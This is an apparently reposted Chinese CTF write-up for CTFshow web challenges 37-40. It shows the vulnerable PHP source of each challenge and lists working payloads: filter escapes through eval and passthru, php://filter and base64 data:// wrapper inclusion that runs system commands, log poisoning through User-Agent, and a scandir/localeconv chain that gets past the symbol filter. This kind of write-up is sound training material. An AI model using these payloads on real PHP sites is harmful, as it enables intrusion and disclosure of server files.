CTFshow web(php命令执行 37-40)
?c=eval($_GET[shy]);­=passthru(‘cat flag.php’); #逃逸过滤
?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php #文件包含
?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php #文件包含
?c=include$_GET[cmd]?>&cmd=data://text/plan, #文件包含
?c=include$_GET[cmd]>&cmd=data://text/plan;base64;PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== #文件包含
?c=data:text/plain; POST: 1=tac flag.php #伪协议
?c=/var/log/nginx/access.log 在 User-Agent插入 #文件日志包含
?c=echo(`tac%09f*`); #反引号
这里是刷题篇,以上命令的原理来自
一篇文章带你进阶CTF命令执行-CSDN博客
可以先磨下刀,刷题更稳
这里的payload:
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
include典型的文件包含,正好我之前写过类似的文章
文件包含提升-CSDN博客
直接照搬上去就好,这里不用phpinfo了,里面没有flag,直接换用
就好了,详细文件包含知识和原理在上面的文章
web38
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag|php|file/i”, $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
还是直接data伪协议读取就好了,这里没有禁用这个,那就
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
web39
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag/i”, $c)){
include($c.”.php”);
}
}else{
highlight_file(__FILE__);
}
还想啥,直接丢命令上去
这里证明还是可以执行这个为协议读取phpinfo的,直接CTRL+f全局查找ctfshow这几个关键字,发现没有flag,不过没事,换个命令就好了
这里别让对面匹配到php,直接用星号或者?替换就好
web40
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\’|\”|\,|\|\/|\?|\\\\/i”, $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
到这里把特殊符号和数字基本都过滤了,有点狠了,之前的命令没有用,现在该凭借能力审计代码了。‘
这里直接引用师傅的解释:
yu22x
先把payload写下 highlight_file(next(array_reverse(scandir(pos(localeconv())))));
需要用到的函数
localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
pos():返回数组中的当前元素的值。
array_reverse():数组逆序
scandir():获取目录下的文件
next(): 函数将内部指针指向数组中的下一个元素,并输出。
首先通过 pos(localeconv())得到点号,因为scandir(’.’)表示得到当前目录下的文件,所以
scandir(pos(localeconv()))就能得到flag.php了。具体内容如下
、
真心希望文章能够帮助大家学习,谢谢!
本文来自网络,不代表协通编程立场,如若转载,请注明出处:https://www.net2asp.com/45db79d285.html
相关推荐
-
Flink之DataStream API 概述
DataStream API 概述 前言 一、DataStream API 应用实例 DataStream程序主要包含3部分: 1、StreamExecutionEnvironme…
-
软考:项目管理8大绩效域知识精华
项目绩效域中的工作是以项目管理原则为指导。原则是基本规范、事实或价值。项目管理原则为参与项目的人员提供了行为指导,因为它们会影响和形成绩效域以产生预期成果。虽然原则和绩效域之间在概…
-
Flink 读取 Kafka 消息写入 Hudi 表无报错但没有写入任何记录的解决方法
博主历时三年精心创作的《大数据平台架构与原型实现:数据中台建设实战》一书现已由知名IT图书品牌电子工业出版社博文视点出版发行,点击《重磅推荐:建大数据平台太难了!给我发个工程原型吧…
-
Zookeeper与Hibernate集成与优化
1.背景介绍 1. 背景介绍 Zookeeper和Hibernate都是在分布式系统中广泛应用的开源技术。Zookeeper是一个开源的分布式协调服务,提供一致性、可靠的数据存储和…
-
Zookeeper与ApacheHBase的集成与使用
1.背景介绍 1. 背景介绍 Apache Zookeeper 和 Apache HBase 都是 Apache 基金会开发的开源项目,它们在分布式系统中发挥着重要作用。Apach…
-
python&numpy十五: 关于numpy的基础练习
下面是一些较为复杂的NumPy练习题及其答案: 题目: 1.创建一个形状为(5, 5)的二维数组,其中每个元素的值等于其行索引加上其列索引的和。 2.创建一个大小为10的随机数组,…
-
ERD助力研发资产沉淀&研发提效
一、从痛点中思考答案 痛点一:复杂系统的设计和逻辑碎片化散落,缺少沉淀导致系统后期维护、迭代以及架构升级都非常困难。 痛点二:由于新需求或新项目导致的系统的老旧逻辑梳理往往耗费大量…
-
Pytorch+NCCL源码编译
目录 环境 1. 安装cudnn 2. 使用pytorch自带NCCL库进行编译 3. 修改NCCL源代码并重新编译后测试,体现出源码更改 环境 Ubuntu 22.04.3 LT…
-
解决Windows程序与Mysql连接报错 [WinError 10048] 通常每个套接字地址(协议/网络地址/端口)只允许使用一次
问题解析 这是因为mysql与程序之间已经耗尽了动态范围内的端口,链接的开关过于频繁 解决方法 打开注册表编辑器,进入目录计算机\HKEY_LOCAL_MACHINE\SYSTEM…
-
python实现音频转文本
网上下载了一堆视频,但是没时间看,想着把视频声音转换成文字,读文字来学习就快多了, 找了一圈没有免费的,还是自己鼓捣一个吧 工具 faster-whisper 音频转文本 ffmp…
![解决Windows程序与Mysql连接报错 [WinError 10048] 通常每个套接字地址(协议/网络地址/端口)只允许使用一次](/img/f1/e45e1f954133479b9ff7a07b89656bfa.png)